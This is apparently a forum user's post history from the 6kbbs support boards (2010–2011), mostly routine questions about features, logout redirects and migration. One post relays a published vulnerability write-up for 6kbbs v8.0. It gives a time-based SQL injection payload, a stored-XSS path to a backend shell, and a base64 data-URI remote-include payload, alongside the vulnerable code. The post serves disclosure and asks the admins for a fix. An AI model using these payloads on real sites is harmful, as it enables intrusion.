请问6kbbs能实现出售功能吗? 终于弄懂了hide里面三个选项的含义:
第一个是回复可见:
第二个是设定积分条件可见:
第三个是指定特定的用户可见:
应该说hide的功能很强大了。可相对其他论坛来说,6kbbs少了一个重要的功能:出售!
希望能实现pw那样的[sell=5]出售内容[/sell],以及附件可以选择是否出售。
所在版块:
使用问题 - 发表时间:
2011-06-04 02:32
退出登录的自动跳转(不完美实现方式) 试了很多方法均不成功,一狠心就把logout.php里的最后一句(不是“?>”啊)替换为header("Location:index.php");这样就直接退出到首页了,不过就没有退出提示了——我爱糯米5inorm
所在版块:
使用问题 - 发表时间:
2011-06-03 02:01
长主题在版面显示不完全 我更改了主题字符限制到128,但是发表的长主题帖在版面里显示不完全啊?能做到DZ那样的版面效果吗?
所在版块:
使用问题 - 发表时间:
2011-02-16 01:32
欲转换52norm原论坛程序,没人来看吗?请管理员看看是怎么回事啊? 因原站内的帖子冗余信息太多,想转换为6kbbs的试一试,但转换不成功,问题现象与http://www.6kbbs.net/view-537.html的一样。
请问是编码问题吗?原站是DZ7.2的GBK编码,但6kbbs好像只有UTF-8的版本。
因原负责注册域名的管理员将域名解析转移至一个目前尚未正常工作的服务器,所以导致了访问异常,其实目前原NORM会员仍然可以通过bbs.5inorm.com访问论坛。
bbs.5inorm.com原是为了降低论坛流量(主机屋声称论坛流量超大,影响服务器上的其他的网站)而做的图片分流站,本身保留有完整的论坛数据!
麻烦管理员帮忙分析一下原因。
所在版块:
使用问题 - 发表时间:
2011-02-01 14:55
52norm因解析问题无法访问,可登录bbs.5inorm.com图片分流站 因原负责注册域名的管理员将域名解析转移至一个目前尚未正常工作的服务器,所以导致了访问异常,其实目前原NORM会员仍然可以通过bbs.5inorm.com访问论坛。
bbs.5inorm.com原是为了降低论坛流量(主机屋声称论坛流量超大,影响服务器上的其他的网站)而做的图片分流站,本身保留有完整的论坛数据!
论坛目前调整中,暂时不会发布新信息。
所在版块:
网站宣传 - 发表时间:
2011-02-01 14:45
6kbbs v8.0论坛两个漏洞? 原文地址:http://www.7747.net/Article/201011/78131.html
我是菜鸟,不能理解他讲的东西,管理员在吗?希望能看一下。
1. 延迟注射:
ajaxmember.php?action=deleteMsgs 80行
case "deleteMsgs":
$msgids=$_POST['msgids'];
//DELETE
if(is_array($msgids)) {
$delids=implode(",",$msgids);
echo "id in ($delids) and touserid={$lg['userid']}";
$db->row_delete("msgs","id in ($delids) and touserid={$lg['userid']}"); //可惜了,是deleted语句,无论结果,只返回 _Y_
}
succeedFlag();
break;
没有错误输出,被迫采用延迟的方法:POST一个 msgids[a]=if(1,sleep(10),1) 进入数据库。
操作语句是:DELETE FROM `db_msgs` WHERE id in ( if(1,sleep(10),1) ) and touserid=1
系统采用md5(username.userpass)的方式。Exp:
2. 论坛跨站:
ajaxmember.php 34行 设置论坛个人信息:
case "modifyDetails":
$user = $_POST['user']; //接收的user数组没有进行htmlspecialchars
if(getPopedom(5)==0){
$user['usertitle']='';
}
if($user["email"]==""){
exit("资料不完整。");
}
foreach(explode(",", $cache_settings['reservedkeyword']) as $rkey){
if(!empty($rkey) && stristr($user['usertitle'],$rkey)){
exit("自定义头衔含有禁用关键字");
}
}
$db->row_update("users",$user,"id={$lg['userid']}"); //存入数据库,函数内SQL有单引号包裹
succeedFlag();
论坛帖子对输出进行了XSS过滤,个人签名等XSS点无法使用。突破点在后台管理编辑用户的地方,所以比较鸡肋。不过系统后台拿shell方法较多,直接编辑脚本即可,利用方法:
注册用户,修改个人信息,装嫩让管理后台编辑你的用户,拿shell。
利用ajax操作后台的js:
http://www.uudisc.com/user/k4shifz/file/3665675
再简单说一下后台:
后台漏洞比较多,编辑脚本拿shell、本地包含,注入,还有个远程包含:
admin\admin.php
......
$inc=strFilter($_GET['inc']);
$action=strFilter($_GET['action']);
......
$inc=str_replace('.','',$inc);echo $inc;
require_once($inc.".php"); //远程包含,可惜在后台
/admin/admin.php?inc=data:;base64,PD9waHAgZWNobyBwaHBpbmZvKCk7Pz4= //phpinfo()
5.2.0以后受制于allow_url_include
捡一个注入:
ajaxadmin.php
case "dotopics":
try{
$postaction=$_POST['postaction'];
$tids=$_POST['tids'];
if(empty($tids)){
echo("没有选中帖子。");
return;
}
if(is_array($tids)) {
$tidstr=implode(",",$tids);
switch($postaction){
case "delPost":
$db->row_delete("posts","tid in ({$tidstr}) and fid={$fid}"); //进入数据库查询
发布作者:k4shifz,由情整理编辑
所在版块:
使用问题 - 发表时间:
2010-11-13 15:51
论坛程序在"主机屋"的免费空间中的BUG? 不知道这算不算是6kbbs的BUG,我测试主机屋的免费空间,才上传上去的时候是正常的,但过一段时间再登陆就可能出现不断刷新页面的情况(用户并没有刷新操作,程序自动的),也有时候论坛只出上半部的情况,不知道是不是和主机屋强制加广告代码的原因。
所在版块:
使用问题 - 发表时间:
2010-11-04 16:26
